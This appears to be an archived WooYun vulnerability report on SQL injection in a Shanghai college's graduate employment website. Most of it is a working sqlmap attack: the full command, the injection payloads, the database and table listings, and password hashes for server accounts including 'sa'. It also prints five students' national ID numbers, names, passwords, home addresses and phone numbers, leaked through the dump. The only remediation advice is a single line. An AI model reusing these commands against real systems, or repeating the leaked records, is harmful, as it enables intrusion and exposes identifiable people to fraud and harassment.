乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
毕业生就业指导办公室工作职责和岗位职责 1、贯彻执行国家教育部和上海市高校毕业生就业指导办公室有关的法规政策,根据学校办学方针负责拟定本校毕业生就业工作计划和具体实施办法。 2、负责本校毕业生的资格审查,及时向市高校毕业生就业指导中心报送毕业生资源情况及就业方案。 3、开展毕业生教育和就业指导:进行辅导员培训,组织就业政策、就业信息、就业技巧等方面的讲座,为毕业生就业工作提供有关指导和咨询。 4、负责接待和处理学生、家长及用人单位的来访和来函,收集用人单位需求信息,及时向毕业生发布。 5、接受用人单位委托,做好毕业生推荐工作,负责通知毕业生初试、复试、录用等事宜。 6、负责学生就业协议书的鉴证登记。 7、按政策规定推荐非上海生源毕业生进沪就业,审核申请进沪就业的非上海生源毕业生的有关材料。 8、协助办理毕业生报到证的发放及相关的离校手续。 9、对毕业生进行跟踪调查,收集用人单位反馈信息,撰写调研报告。 10、负责处理毕业生就业过程中的违约改签及遗留问题。
地址:http://**.**.**.**
$ python sqlmap.py -u "http://**.**.**.**" -p ClassID --technique=ES --form --random-agent --batch --hex -D SJQCCenterOfCareer -T dbo.Student -C 考生号,身份证,姓名,密码,家庭地址,联系电话,联系地址 --dump --start 1 --stop 5
Database: SJQCCenterOfCareer+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.Student | 21916 |
选取小部分进行展示:
Table: Student[5 entries]+------+--------------------+------+-------+------------------+-------------+----------------------+| 考生号 | 身份证 | 姓名 | 密码 | 家庭地址 | 联系电话 | 联系地址 |+------+--------------------+------+-------+------------------+-------------+----------------------+| NULL | 310115199205193816 | 刀海松 | A9E11 | 上海市浦东区惠南镇惠东路56号 | 18221642709 | 上海市浦东区惠南镇惠东路56号 || NULL | 330411199210290818 | 言俊杰 | A9E11 | 上海市浦东新区康桥路1500号 | 18817591856 | 上海市浦东新区康桥路1500号 || NULL | 430424198802040012 | 伊阿娜恋 | A9E11 | <blank> | <blank> | <blank> || NULL | 320882199404093068 | 伊亚培 | A9E11 | 江西省南昌市高安市安居小区 | 18817809442 | 上海市浦东新区沪城环路1111号建桥学院 || NULL | 411522199502222417 | 易怀信 | A9E11 | 河南光山县和谐家园小区3号楼4楼 | 13782947826 | 上海建桥学院11栋楼2单元1021 |+------+--------------------+------+-------+------------------+-------------+----------------------+
---Parameter: ClassID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz' AND 2526=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2526=2526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'PsDs'='PsDs&keyword= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz';WAITFOR DELAY '0:0:5'--&keyword=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000current user: 'center'current user is DBA: Truedatabase management system users [6]:[*] center[*] G&M&sys[*] IJcenter[*] JIANQIAO-F9F629\\Administrator[*] jobdateshare[*] sadatabase management system users password hashes:[*] BUILTIN\\Administrators [1]: password hash: NULL[*] center [1]: password hash: 0x010055463e0a182a46c8d265730e64453fb5668e74c603f43835fe6b5c232810b5066618ff0964d68dea1c3d7f73 header: 0x0100 salt: 55463e0a mixedcase: 182a46c8d265730e64453fb5668e74c603f43835 uppercase: fe6b5c232810b5066618ff0964d68dea1c3d7f73[*] G&M&sys [1]: password hash: 0x01005137c3004295d66e8e55edd5d2e97e142b2940dce8dbb4c1c9661838b046abda3d6d3ec8631bf32bb2ec10ee header: 0x0100 salt: 5137c300 mixedcase: 4295d66e8e55edd5d2e97e142b2940dce8dbb4c1 uppercase: c9661838b046abda3d6d3ec8631bf32bb2ec10ee[*] IJcenter [1]: password hash: 0x0100531dd87d23aaa5d9ef6e7818d7881207eee96963e0cf2dc32c8e14801317c4b76698b2ca787f7a66cc2d6f9f header: 0x0100 salt: 531dd87d mixedcase: 23aaa5d9ef6e7818d7881207eee96963e0cf2dc3 uppercase: 2c8e14801317c4b76698b2ca787f7a66cc2d6f9f[*] JIANQIAO-F9F629\\Administrator [1]: password hash: NULL[*] jobdateshare [1]: password hash: 0x0100ca632508fbcc39b6a0fbf83319c4e498e0e8e85f55d268aed81d2e133ba002a9b3a0cc6e56dc02eb017cc06d header: 0x0100 salt: ca632508 mixedcase: fbcc39b6a0fbf83319c4e498e0e8e85f55d268ae uppercase: d81d2e133ba002a9b3a0cc6e56dc02eb017cc06d[*] sa [1]: password hash: 0x01000d1d4933d8400a2de95eca66c9f22ca9fbbaa895a86607dbe84db72acabed5f5c089fb2e92d70df1b52f0587 header: 0x0100 salt: 0d1d4933 mixedcase: d8400a2de95eca66c9f22ca9fbbaa895a86607db uppercase: e84db72acabed5f5c089fb2e92d70df1b52f0587Database: tempdb+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.syssegments | 3 |+--------------------------------------------+---------+Database: msdb+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.RTblRelships | 6910 || dbo.RTblIfaceHier | 3345 || dbo.RTblVersionAdminInfo | 2328 || dbo.RTblVersions | 2328 || dbo.RTblNamedObj | 2191 || dbo.RTblIfaceMem | 1186 || dbo.RTblPropDefs | 794 || dbo.RTblClassDefs | 537 || dbo.RTblIfaceDefs | 452 || dbo.RTblProps | 392 || dbo.RTblRelColDefs | 320 || dbo.backupfile | 248 || dbo.RTblRelshipDefs | 144 || dbo.RTblParameterDef | 136 || dbo.sysjobhistory | 128 || dbo.backupset | 124 || dbo.backupmediafamily | 117 || dbo.backupmediaset | 117 || dbo.sysconstraints | 99 || dbo.RTblSites | 38 || dbo.RTblRelshipProps | 28 || dbo.syscategories | 19 || dbo.RTblTypeLibs | 16 || dbo.sysalerts | 9 || dbo.restorefile | 8 || dbo.restorefilegroup | 4 || dbo.restorehistory | 4 || dbo.sysdbmaintplan_databases | 3 || dbo.sysdbmaintplans | 3 || dbo.sysdtscategories | 3 || dbo.syssegments | 3 || dbo.sysdbmaintplan_jobs | 2 || dbo.sysjobs | 2 || dbo.sysjobs_view | 2 || dbo.sysjobschedules | 2 || dbo.sysjobservers | 2 || dbo.sysjobsteps | 2 || dbo.RTblDatabaseVersion | 1 || dbo.systargetservers_view | 1 |+--------------------------------------------+---------+Database: SJQCCenterOfCareer+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.Student | 21916 || dbo.V_StudentSeek | 21916 || dbo.V_StudentCheck | 21914 || dbo.UserLoginRecord | 15601 || dbo.Student_among | 13422 || dbo.student_temp | 13422 || dbo.Application | 6700 || dbo.V_StuApplication | 6653 || dbo.V_EntApplication | 6293 || dbo.Position | 5690 || dbo.EnterpriseDatabase | 5039 || dbo.Faxposion | 3301 || dbo.Enterprise | 2816 || dbo.Certificate | 2654 || dbo.Recruitment | 2208 || dbo.Message | 2014 || dbo.V_EntMessage | 2011 || dbo.V_StuMessage | 1993 || dbo.PushRecord | 992 || dbo.Activity | 874 || dbo.V_Activity | 836 || dbo.V_PositionSeek | 836 || dbo.Information | 629 || dbo.FaxApplication | 574 || dbo.V_StuFaxApplication | 567 || dbo.V_Information | 505 || dbo.Answer | 404 || dbo.V_Answer | 404 || dbo.Link | 300 || dbo.sysconstraints | 201 || dbo.T_ZXBZ_DW | 98 || dbo.LeaveMessage | 93 || dbo.CampusRecruitment | 92 || dbo.dwhy | 92 || dbo.DepaUser | 89 || dbo.V_Link | 81 || dbo.T_ZXBZ_ZY | 78 || dbo.T_ZXBZ_MZ | 57 || dbo.T_ZXBZ_XL | 29 || dbo.dtproperties | 14 || dbo.dwxz | 14 || dbo.T_ZXBZ_ZZMM | 14 || dbo.depaintroduction | 9 || dbo.MeetTable | 7 || dbo.T_ZXBZ_XB | 4 || dbo.syssegments | 3 || dbo.Administration | 2 || dbo.counter | 1 || dbo.xKeyTable | 1 |+--------------------------------------------+---------+Database: pubs+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.roysched | 86 || dbo.employee | 43 || dbo.sysconstraints | 34 || dbo.titleauthor | 25 || dbo.titleview | 25 || dbo.authors | 23 || dbo.sales | 21 || dbo.titles | 18 || dbo.jobs | 14 || dbo.pub_info | 8 || dbo.publishers | 8 || dbo.stores | 6 || dbo.discounts | 3 || dbo.syssegments | 3 |+--------------------------------------------+---------+Database: master+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.whitepaper | 4000 || INFORMATION_SCHEMA.PARAMETERS | 3617 || dbo.Enterprise | 1195 || INFORMATION_SCHEMA.ROUTINES | 1019 || dbo.spt_values | 730 || INFORMATION_SCHEMA.COLUMNS | 692 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379 || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 302 || INFORMATION_SCHEMA.ROUTINE_COLUMNS | 159 || dbo.dwhy | 92 || INFORMATION_SCHEMA.VIEW_TABLE_USAGE | 63 || dbo.mzdmb | 58 || INFORMATION_SCHEMA.TABLES | 58 || dbo.Administrator | 56 || dbo.dwdq | 40 || dbo.spt_datatype_info | 36 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 34 || dbo.dwxz | 33 || dbo.spt_server_info | 29 || INFORMATION_SCHEMA.VIEWS | 26 || dbo.spt_provider_types | 25 || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE | 24 || INFORMATION_SCHEMA.KEY_COLUMN_USAGE | 24 || dbo.gzzwb | 18 || dbo.sysconstraints | 17 || dbo.Entcode | 16 || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE | 16 || INFORMATION_SCHEMA.TABLE_CONSTRAINTS | 16 || dbo.EVisitTable | 13 || dbo.depacode | 10 || dbo.spt_datatype_info_ext | 10 || INFORMATION_SCHEMA.SCHEMATA | 8 || dbo.obtainway | 7 || dbo.syslogins | 7 || dbo.tjxy | 4 || dbo.SMInfo | 3 || dbo.syssegments | 3 || dbo.MSreplication_options | 2 || dbo.Information | 1 || dbo.spt_monitor | 1 || dbo.sysoledbusers | 1 || dbo.SysParameter | 1 |+--------------------------------------------+---------+Database: model+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.syssegments | 3 |+--------------------------------------------+---------+Database: Northwind+--------------------------------------------+---------+| Table | Entries |+--------------------------------------------+---------+| dbo.[Order Details Extended] | 2155 || dbo.[Order Details] | 2155 || dbo.Invoices | 2155 || dbo.[Order Subtotals] | 830 || dbo.[Orders Qry] | 830 || dbo.Orders | 830 || dbo.[Summary of Sales by Quarter] | 809 || dbo.[Summary of Sales by Year] | 809 || dbo.[Customer and Suppliers by City] | 120 || dbo.Customers | 91 || dbo.[Quarterly Orders] | 86 || dbo.[Product Sales for 1997] | 77 || dbo.[Sales by Category] | 77 || dbo.Products | 77 || dbo.[Alphabetical list of products] | 69 || dbo.[Current Product List] | 69 || dbo.[Products by Category] | 69 || dbo.[Sales Totals by Amount] | 66 || dbo.Territories | 53 || dbo.EmployeeTerritories | 49 || dbo.sysconstraints | 43 || dbo.Suppliers | 29 || dbo.[Products Above Average Price] | 25 || dbo.Employees | 9 || dbo.[Category Sales for 1997] | 8 || dbo.Categories | 8 || dbo.Region | 4 || dbo.Shippers | 3 || dbo.syssegments | 3 |+--------------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: masterTable: Administrator[1 column]+--------+---------+| Column | Type |+--------+---------+| Pass | varchar |+--------+---------+Database: masterTable: syslogins[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: masterTable: sysoledbusers[1 column]+-------------+----------+| Column | Type |+-------------+----------+| rmtpassword | nvarchar |+-------------+----------+Database: masterTable: Administrator[5 entries]+--------+| Pass |+--------+| 18AA47 || 70E78 || 72FEC || A9E11 || D5438 |+--------+Database: masterTable: syslogins[7 entries]+-------------------------------------------------+| password |+-------------------------------------------------+| \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? || \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? || \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? || \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? || \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? || \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? || \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? |+-------------------------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: ClassID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz' AND 2526=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2526=2526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'PsDs'='PsDs&keyword= Type: stacked sqlmap resumed the following injection point(s) from stored session:---Parameter: ClassID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz' AND 2526=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2526=2526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'PsDs'='PsDs&keyword= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz';WAITFOR DELAY '0:0:5'--&keyword=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000Database: SJQCCenterOfCareerTable: Student[47 columns]+---------+----------+| Column | Type |+---------+----------+| 一等奖 | char || 三等奖 | char || 专业 | varchar || 专业代码 | varchar || 个人特长 | varchar || 个人经历 | text || 二等奖 | char || 入学年份 | int || 公开简历 | char || 其他奖 | text || 其他证书 | text || 出生年月 | datetime || 图片类型 | char || 培养年限 | float || 大学英语 | varchar || 姓名 | varchar || 学制 | float || 学历 | varchar || 学号 | varchar || 学院 | varchar || 家庭地址 | varchar || 家庭邮编 | varchar || 密码 | varchar || 就业意向 | varchar || 性别 | char || 手机 | varchar || 担任过社会工作 | varchar || 推荐意见 | text || 政治面貌 | varchar || 是否签约 | char || 校级以上奖励 | text || 毕业年份 | varchar || 民族 | varchar || 求职意向 | varchar || 生源地 | varchar || 生源确认 | char || 电子邮箱 | varchar || 社会实践情况 | text || 简历类型 | varchar || 考生号 | varchar || 联系地址 | varchar || 联系电话 | varchar || 自我介绍 | text || 计算机级 | varchar || 身份证 | varchar || 辅修专业 | varchar || 邮编 | char |+---------+----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: ClassID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz' AND 2526=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2526=2526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'PsDs'='PsDs&keyword= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz';WAITFOR DELAY '0:0:5'--&keyword=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000Database: SJQCCenterOfCareerTable: Student[5 entries]+------+--------------------+------+-------+------------------+-------------+----------------------+| 考生号 | 身份证 | 姓名 | 密码 | 家庭地址 | 联系电话 | 联系地址 |+------+--------------------+------+-------+------------------+-------------+----------------------+| NULL | 310115199205193816 | 刀海松 | A9E11 | 上海市浦东区惠南镇惠东路56号 | 18221642709 | 上海市浦东区惠南镇惠东路56号 || NULL | 330411199210290818 | 言俊杰 | A9E11 | 上海市浦东新区康桥路1500号 | 18817591856 | 上海市浦东新区康桥路1500号 || NULL | 430424198802040012 | 伊阿娜恋 | A9E11 | <blank> | <blank> | <blank> || NULL | 320882199404093068 | 伊亚培 | A9E11 | 江西省南昌市高安市安居小区 | 18817809442 | 上海市浦东新区沪城环路1111号建桥学院 || NULL | 411522199502222417 | 易怀信 | A9E11 | 河南光山县和谐家园小区3号楼4楼 | 13782947826 | 上海建桥学院11栋楼2单元1021 |+------+--------------------+------+-------+------------------+-------------+----------------------+
增加过滤。
危害等级:无影响厂商忽略
忽略时间:2015-11-28 10:54
暂无
